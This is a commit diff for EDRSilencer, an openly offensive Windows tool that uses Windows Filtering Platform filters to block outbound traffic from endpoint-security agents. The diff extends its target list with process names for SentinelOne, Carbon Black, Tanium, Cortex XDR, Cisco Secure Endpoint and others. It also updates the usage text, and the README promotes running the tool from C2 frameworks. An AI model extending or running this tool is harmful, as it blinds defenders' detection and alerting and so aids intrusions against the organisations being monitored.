Update to include Cisco Secure Endpoint (credit @logdumpster). Also, removed CrowdStrike from the supporting list as blocking its service process is insufficient. Require further testing

Added Qualys EDR process

EDRSilencer.c

@@ -4,12 +4,56 @@ char* edrProcess[] = {
 // Microsoft Defender for Endpoint and Microsoft Defender Antivirus
     "MsMpEng.exe",
     "MsSense.exe",
+    "SenseIR.exe",
+    "SenseNdr.exe",
+    "SenseCncProxy.exe",
+    "SenseSampleUploader.exe",
 // Elastic EDR
     "elastic-agent.exe",
     "elastic-endpoint.exe",
     "filebeat.exe",
 // Trellix EDR
-    "xagt.exe"
+    "xagt.exe",
+// Qualys EDR
+    "QualysAgent.exe",
+// SentinelOne
+    "SentinelAgent.exe",
+    "SentinelAgentWorker.exe",
+    "SentinelServiceHost.exe",
+    "SentinelStaticEngine.exe",  
+    "LogProcessorService.exe",
+    "SentinelStaticEngineScanner.exe",
+    "SentinelHelperService.exe",
+    "SentinelBrowserNativeHost.exe",
+// Cylance
+    "CylanceSvc.exe",
+// Cybereason
+    "AmSvc.exe",
+    "CrAmTray.exe",
+    "CrsSvc.exe",
+    "ExecutionPreventionSvc.exe",
+    "CybereasonAV.exe",
+// Carbon Black EDR
+    "cb.exe",
+// Carbon Black Cloud
+    "RepMgr.exe",
+    "RepUtils.exe",
+    "RepUx.exe",
+    "RepWAV.exe",
+    "RepWSC.exe",
+// Tanium
+    "TaniumClient.exe",
+    "TaniumCX.exe",
+    "TaniumDetectEngine.exe",
+// Palo Alto Networks Traps/Cortex XDR
+    "Traps.exe",
+    "cyserver.exe",
+    "CyveraService.exe",
+    "CyvrFsFlt.exe",
+// FortiEDR
+    "fortiedr.exe",
+// Cisco Secure Endpoint (Formerly Cisco AMP)
+    "sfc.exe"
 };
 
 BOOL inWfpFlag[sizeof(edrProcess) / sizeof(edrProcess[0])] = { FALSE };
@@ -282,15 +326,16 @@ void UnblockWfpFilter(UINT64 filterId) {
 }
 
 void PrintHelp() {
-    printf("Usage: EDROutBlock.exe <blockedr/block/unblockall/unblock>\n");
+    printf("Usage: EDRSilencer.exe <blockedr/block/unblockall/unblock>\n");
+    printf("Version: 1.1\n");
     printf("- Add WFP filters to block the IPv4 and IPv6 outbound traffic of all detected EDR processes:\n");
-    printf("  EDROutBlock.exe blockedr\n\n");
+    printf("  EDRSilencer.exe blockedr\n\n");
     printf("- Add WFP filters to block the IPv4 and IPv6 outbound traffic of a specific process (full path is required):\n");
-    printf("  EDROutBlock.exe block \"C:\\Windows\\System32\\curl.exe\"\n\n");
+    printf("  EDRSilencer.exe block \"C:\\Windows\\System32\\curl.exe\"\n\n");
     printf("- Remove all WFP filters applied by this tool:\n");
-    printf("  EDROutBlock.exe unblockall\n\n");
+    printf("  EDRSilencer.exe unblockall\n\n");
     printf("- Remove a specific WFP filter based on filter id:\n");
-    printf("  EDROutBlock.exe unblock <filter id>");
+    printf("  EDRSilencer.exe unblock <filter id>");
 }
 
 int main(int argc, char *argv[]) {

README.md

@@ -8,7 +8,22 @@ This tool offers the following features:
 - Remove a specific WFP filter by filter id
 - Support to run in C2 with in-memory PE execution module (e.g., `BruteRatel's memexec`)
 
-**The current EDR process block list (edrProcess) includes only a limited number of EDR solutions (e.g., MDE, Elastic EDR). It would be appreciated if someone could assist in expanding the process list in `EDRSilencer.c` to encompass a broader range of other EDR solutions.**
+The tool currently supports the following EDRs:
+- Microsoft Defender for Endpoint and Microsoft Defender Antivirus
+- Elastic EDR
+- Trellix EDR
+- Qualys EDR
+- SentinelOne
+- Cylance
+- Cybereason
+- Carbon Black EDR
+- Carbon Black Cloud
+- Tanium
+- Palo Alto Networks Traps/Cortex XDR
+- FortiEDR
+- Cisco Secure Endpoint (Formerly Cisco AMP)
+
+**As I do not have access to all these EDRs for testing, please do not hesitate to correct me if the listed processes (edrProcess in `EDRSilencer.c`) prove insufficient in blocking all alert, detection, or event forward traffic.**
 
 ## Testing Environment
 Tested in Windows 10 and Windows Server 2016